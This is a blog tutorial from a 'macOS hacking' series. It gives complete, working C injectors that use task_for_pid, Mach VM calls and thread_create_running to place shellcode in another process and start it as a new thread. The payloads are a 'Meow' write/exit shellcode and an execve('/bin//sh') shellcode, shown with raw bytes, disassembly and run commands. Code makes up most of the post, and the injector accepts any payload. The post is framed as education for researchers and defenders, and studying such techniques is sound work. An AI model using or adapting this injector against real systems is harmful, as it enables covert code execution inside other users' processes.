MacOS hacking part 10: shellcode injection via task_for_pid - create remote thread. Simple C (Intel) example

﷽

Hello, cybersecurity enthusiasts and white hackers!

In the previous post we stole an existing thread: we paused a victim, rewired its registers so RIP pointed at our buffer, and let it run. That’s thread hijacking - fast, but risky: you might grab a thread in the middle of a syscall, under a lock, or with an odd stack frame. Race conditions and crashes are common.

Today, we’re going further - instead of hijacking an existing thread, we’ll create an entirely new thread in the target process using thread_create_running. This is a cleaner and more stable technique with fewer side effects.

This technique is known as remote thread injection. It needs the same permissions as before (task_for_pid), but the flow is slightly different. Here’s what happens:

1. Find the PID of the victim process.
2. Use task_for_pid to get the task port for the victim.
3. Allocate memory in the remote process.
4. Write the shellcode into that memory.
5. Mark the memory executable.
6. Allocate a dummy stack.
7. Set up the CPU registers (RIP to the shellcode, RSP near the top of the dummy stack).
8. Spawn a thread in the victim using thread_create_running.

practical example

Let’s build a PoC for this technique step by step.

When hijacking a thread, you’re overwriting its context, resuming it, and hoping it behaves. This can crash or deadlock the process if you’re not careful. With new thread injection, we avoid all that. We get a clean, isolated thread to run our shellcode, and the rest of the process is (mostly) untouched.

First, attach to the process as before:

pid_t pid = atoi(argv[1]);
task_t task;
kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] attached to pid %d\n", pid);

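You’ll need root for this. Even as root, with SIP enabled task_for_pid() is typically refused for Apple platform binaries and for hardened-runtime processes that lack the get-task-allow entitlement, so test against your own locally built victim.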
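One small robustness note on the snippet above: atoi() returns 0 for non-numeric input, so a typo on the command line silently becomes PID 0. A minimal sketch of a stricter parser follows; parse_pid is a hypothetical helper, not part of the original PoC, and it assumes that only strictly positive decimal PIDs are acceptable.

```c
#include <errno.h>
#include <limits.h>
#include <stdlib.h>
#include <sys/types.h>

/* Hypothetical helper (not in the original PoC): parse a strictly positive
 * decimal PID. Returns 0 on success and stores the result in *out;
 * returns -1 on empty input, trailing junk, overflow, or a value <= 0. */
static int parse_pid(const char *s, pid_t *out) {
  char *end = NULL;
  errno = 0;
  long v = strtol(s, &end, 10);
  if (end == s || *end != '\0') return -1;            /* no digits, or trailing junk */
  if (errno == ERANGE || v <= 0 || v > INT_MAX) return -1;
  *out = (pid_t)v;
  return 0;
}
```

In the injector this would replace the atoi() call, printing the usage message and exiting when parse_pid() returns -1.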

Then use mach_vm_allocate() with VM_FLAGS_ANYWHERE to let the kernel pick a free region in the remote address space for the shellcode:

mach_vm_address_t remote_addr = 0;
vm_size_t shellcode_size = sizeof(shellcode);

kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] allocated memory at 0x%llx\n", remote_addr);
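Mach allocates virtual memory in whole pages, so the few dozen bytes we ask for still occupy a full page, and the later protection change applies to that whole page too. The arithmetic can be sketched as below; round_up_to_page is a hypothetical helper, and the 4096-byte page size is an assumption that matches Intel Macs (real code should query the page size instead of hard-coding it).

```c
#include <stdint.h>

/* Hypothetical helper: round size up to a multiple of page_size.
 * page_size must be a power of two (4096 is assumed for Intel Macs). */
static uint64_t round_up_to_page(uint64_t size, uint64_t page_size) {
  return (size + page_size - 1) & ~(page_size - 1);
}
```

For the 42-byte buffer in this post (41 opcode bytes plus the string literal's trailing NUL), round_up_to_page(42, 4096) gives 4096, which is a single page.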

Write shellcode to remote memory:

kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] wrote shellcode\n");

Next, flip the pages to R-X. Executing from a non-executable page raises a bus error on macOS, so don’t skip this.

kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
  return 1;
}
printf("[+] set memory protections to RX\n");

Set up the thread state and a dummy stack:

// setup new thread state
x86_thread_state64_t state;
thread_act_t thread;
mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
memset(&state, 0, sizeof(state));

// set instruction pointer (rip) to our shellcode
state.__rip = remote_addr;

// stack pointer (rsp) should be valid; just allocate a dummy stack
mach_vm_address_t remote_stack = 0;
kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
  return 1;
}

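The top of the freshly allocated page is already 16-byte aligned. Subtracting 8 leaves RSP in the state the x86_64 System V ABI expects at function entry, as if a call had just pushed a return address (RSP + 8 is a multiple of 16). Our shellcode only pushes a value and issues syscalls, so this is more good hygiene than a hard requirement here:

state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8 (function-entry alignment)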
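The stack pointer arithmetic is easy to get wrong by 8 bytes, so here is a small sketch of it in isolation. Both helper names are hypothetical, and the convention checked is the System V one (RSP + 8 divisible by 16 on function entry).

```c
#include <stdint.h>

/* Hypothetical helper: initial RSP for a fresh thread whose stack region
 * starts at stack_base and is stack_size bytes long. */
static uint64_t initial_rsp(uint64_t stack_base, uint64_t stack_size) {
  uint64_t top = (stack_base + stack_size) & ~(uint64_t)0xF; /* 16-byte align the top */
  return top - 8;  /* as if a call had just pushed a return address */
}

/* Returns 1 if rsp looks like a System V function-entry stack pointer. */
static int is_entry_aligned(uint64_t rsp) {
  return (rsp + 8) % 16 == 0;
}
```

With a page at 0x10000 and a size of 0x1000, initial_rsp() returns 0x10ff8, the same value the PoC computes with remote_stack + 0x1000 - 8.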

Finally, create the thread:

kr = thread_create_running(task,
  x86_THREAD_STATE64,
  (thread_state_t)&state,
  state_count,
  &thread);

if (kr != KERN_SUCCESS) {
  fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
  return 1;
}

printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
printf("[+] shellcode running in PID %d via new thread.\n", pid);

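What is going on here? We ask the kernel to spin up a new thread in the target with our register context, and the scheduler starts it at our entry point. Keep in mind that this is a bare Mach thread with no pthread state behind it: a payload that only issues raw syscalls, like ours, is fine, while code that calls into libc generally is not.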

Finally, we need shellcode:

unsigned char shellcode[] =
  "\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
  "\x50\xbf\x01\x00\x00\x00"
  "\x48\x89\xe6\xba\x05\x00\x00\x00"
  "\xb8\x04\x00\x00\x02\x0f\x05"
  "\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";

It comes from one of the previous posts in this macOS hacking series:

global start

section .text
start:
  mov rax, 0x0a776f654d     ; "\nwoeM" in little-endian
  push rax                  ; string now on stack

  mov rdi, 1                ; fd = 1 (stdout)
  mov rsi, rsp              ; pointer to "Meow\n"
  mov rdx, 5                ; length = 5 bytes
  mov rax, 0x2000004        ; syscall: write
  syscall

  mov rax, 0x2000001        ; syscall: exit
  xor rdi, rdi              ; exit code 0
  syscall
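Two details in this listing are worth checking by hand: the 64-bit immediate really does spell "Meow\n" once it is stored little-endian on the stack, and the syscall numbers are the plain BSD numbers (4 for write, 1 for exit) with class 2 in the top byte. A minimal sketch that reproduces both; store_le64 and bsd_syscall are hypothetical helper names used only for illustration.

```c
#include <stddef.h>
#include <stdint.h>

/* Store v as 8 little-endian bytes, the way push rax lays it out on x86_64. */
static void store_le64(uint64_t v, unsigned char out[8]) {
  for (size_t i = 0; i < 8; i++) {
    out[i] = (unsigned char)(v >> (8 * i));
  }
}

/* macOS x86_64 syscall numbers carry a class in the top byte;
 * class 2 is the BSD/Unix class, hence the 0x2000000 prefix. */
static uint32_t bsd_syscall(uint32_t n) {
  return (2u << 24) | n;
}
```

store_le64(0x0a776f654d, buf) yields the bytes 4d 65 6f 77 0a followed by zeros, and bsd_syscall(4) and bsd_syscall(1) give the 0x2000004 and 0x2000001 constants used above.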

Note that the exit syscall ends the whole victim process, not just the injected thread. The full source code, hack.c, looks like this:

/*
 * hack.c
 * macOS x86_64 shellcode injection 
 * using task_for_pid and 
 * remote thread creation
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>

unsigned char shellcode[] =
  "\x48\xb8\x4d\x65\x6f\x77\x0a\x00\x00\x00"
  "\x50\xbf\x01\x00\x00\x00"
  "\x48\x89\xe6\xba\x05\x00\x00\x00"
  "\xb8\x04\x00\x00\x02\x0f\x05"
  "\xb8\x01\x00\x00\x02\x48\x31\xff\x0f\x05";

int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <pid>\n", argv[0]);
    return 1;
  }

  pid_t pid = atoi(argv[1]);
  task_t task;
  kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] attached to pid %d\n", pid);

  mach_vm_address_t remote_addr = 0;
  vm_size_t shellcode_size = sizeof(shellcode);

  kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] allocated memory at 0x%llx\n", remote_addr);

  kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] wrote shellcode\n");

  kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] set memory protections to RX\n");

  // setup new thread state
  x86_thread_state64_t state;
  thread_act_t thread;
  mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
  memset(&state, 0, sizeof(state));

  // set instruction pointer (rip) to our shellcode
  state.__rip = remote_addr;

  // stack pointer (rsp) should be valid; just allocate a dummy stack
  mach_vm_address_t remote_stack = 0;
  kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
    return 1;
  }
  state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8 (function-entry alignment)

  kr = thread_create_running(task,
    x86_THREAD_STATE64,
    (thread_state_t)&state,
    state_count,
    &thread);

  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
    return 1;
  }

  printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
  printf("[+] shellcode running in PID %d via new thread.\n", pid);

  return 0;
}

demo

Let’s see this in action. First of all, we need a “victim” process. As usual, let me use meow.c:

/*
 * meow.c
 * victim process for macOS injection tests
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

int main() {
  printf("victim process started. PID: %d\n", getpid());

  while (1) {
    printf("meow-meow... PID: %d\n", getpid());
    sleep(5); // simulate periodic activity
  }

  return 0;
}

Compile it:

clang -o meow meow.c

and check:

./meow

Then compile our injector:

clang -o hack hack.c

And run:

./hack <PID>

As you can see, everything worked perfectly! =^..^=

practical example 2

For the second example, only the shellcode changes. This payload performs execve("/bin//sh", NULL, NULL):

/*
 * hack2.c
 * macOS x86_64 shellcode injection 
 * using task_for_pid and 
 * remote thread creation
 * author @cocomelonc
 * https://cocomelonc.github.io/macos/2025/08/24/malware-mac-10.html
 */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/mach_vm.h>
#include <mach/thread_act.h>
#include <mach/thread_status.h>

unsigned char shellcode[] =
  /* 0000 */ "\x31\xf6"                                 /* xor     esi, esi                */
  /* 0002 */ "\xf7\xe6"                                 /* mul     esi                     */
  /* 0004 */ "\x0f\xba\xe8\x19"                         /* bts     eax, 0x19               */
  /* 0008 */ "\xb0\x3b"                                 /* mov     al, 0x3b                */
  /* 000A */ "\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68" /* movabs  rbx, 0x68732f2f6e69622f */
  /* 0014 */ "\x52"                                     /* push    rdx                     */
  /* 0015 */ "\x53"                                     /* push    rbx                     */
  /* 0016 */ "\x54"                                     /* push    rsp                     */
  /* 0017 */ "\x5f"                                     /* pop     rdi                     */
  /* 0018 */ "\x0f\x05";                                /* syscall                         */


int main(int argc, char *argv[]) {
  if (argc != 2) {
    fprintf(stderr, "usage: %s <pid>\n", argv[0]);
    return 1;
  }

  pid_t pid = atoi(argv[1]);
  task_t task;
  kern_return_t kr = task_for_pid(mach_task_self(), pid, &task);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] task_for_pid() failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] attached to pid %d\n", pid);

  mach_vm_address_t remote_addr = 0;
  vm_size_t shellcode_size = sizeof(shellcode);

  kr = mach_vm_allocate(task, &remote_addr, shellcode_size, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] allocated memory at 0x%llx\n", remote_addr);

  kr = mach_vm_write(task, remote_addr, (vm_offset_t)shellcode, shellcode_size);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_write failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] wrote shellcode\n");

  kr = mach_vm_protect(task, remote_addr, shellcode_size, FALSE, VM_PROT_READ | VM_PROT_EXECUTE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_protect failed: %s\n", mach_error_string(kr));
    return 1;
  }
  printf("[+] set memory protections to RX\n");

  // setup new thread state
  x86_thread_state64_t state;
  thread_act_t thread;
  mach_msg_type_number_t state_count = x86_THREAD_STATE64_COUNT;
  memset(&state, 0, sizeof(state));

  // set instruction pointer (rip) to our shellcode
  state.__rip = remote_addr;

  // stack pointer (rsp) should be valid; just allocate a dummy stack
  mach_vm_address_t remote_stack = 0;
  kr = mach_vm_allocate(task, &remote_stack, 0x1000, VM_FLAGS_ANYWHERE);
  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] mach_vm_allocate (stack) failed: %s\n", mach_error_string(kr));
    return 1;
  }
  state.__rsp = remote_stack + 0x1000 - 8; // top of stack minus 8 (function-entry alignment)

  kr = thread_create_running(task,
    x86_THREAD_STATE64,
    (thread_state_t)&state,
    state_count,
    &thread);

  if (kr != KERN_SUCCESS) {
    fprintf(stderr, "[-] thread_create_running failed: %s\n", mach_error_string(kr));
    return 1;
  }

  printf("[+] remote thread created at RIP=0x%llx, RSP=0x%llx\n", state.__rip, state.__rsp);
  printf("[+] shellcode running in PID %d via new thread.\n", pid);

  return 0;
}

demo 2

Let’s see the second example in action.

Compile it:

clang -o hack2 hack2.c

Run victim process:

./meow

Then run injector:

./hack2 <PID>

As you can see, in this case everything also worked as expected! =^..^=

For debugging purposes you can use lldb:

lldb -p <PID>
thread list

After running the injector, check the thread list again:

thread list

As you can see, the new thread was successfully created!

Check shellcode:

disassemble --start-address=<our_remote_address> --count=16

As you can see, the shellcode was successfully injected and the thread was created! =^..^=
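When comparing what lldb shows at the remote address with what we meant to inject, it can help to print the local shellcode buffer as hex and diff the two by eye. A minimal sketch, assuming a hypothetical hex_string helper that is not part of the original PoC:

```c
#include <stddef.h>
#include <stdio.h>

/* Hypothetical helper: write buf as lowercase hex pairs separated by spaces
 * into out (NUL-terminated). Returns 0 on success, -1 if out is too small. */
static int hex_string(const unsigned char *buf, size_t len,
                      char *out, size_t out_size) {
  size_t need = len ? len * 3 : 1;  /* "xx " per byte; the last space slot holds the NUL */
  if (out_size < need) return -1;
  out[0] = '\0';
  for (size_t i = 0; i < len; i++) {
    /* The remaining capacity is passed so snprintf can never overrun out. */
    snprintf(out + i * 3, out_size - i * 3,
             i + 1 < len ? "%02x " : "%02x", buf[i]);
  }
  return 0;
}
```

Calling it on the first bytes of the shellcode (0x48, 0xb8, 0x4d) produces the string "48 b8 4d", which can be matched against the output of lldb's memory read at the address the injector printed.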

Unfortunately, lldb doesn’t let you search threads by address directly - you’ll have to look manually. Breakpoints can be tricky because you don’t know the shellcode address ahead of time unless the injector prints it. If your thread finishes quickly, lldb might not catch it unless you attach early.

If you want, you can use lldb’s Python scripting to auto-select the injected thread by its TID or to dump memory around RIP.

conclusion

Thread hijack shows how fragile cross-process execution can be. Remote thread creation shows the stable alternative: give your code a clean context and stack, don’t kidnap a live worker. Both leave trails; both are increasingly constrained by platform hardening. Understanding the mechanics helps defenders build better telemetry - and helps researchers avoid self-inflicted crashes.

I hope this post is useful for malware researchers, macOS/Apple security researchers, and C/C++/ASM programmers, spreads awareness of this interesting technique among blue teamers, and adds a weapon to the red teamers’ arsenal.

macOS hacking part 1
macOS hacking part 9
source code in github

This is a practical case for educational purposes only.

Thanks for your time, happy hacking, and goodbye!
PS. All drawings and screenshots are mine
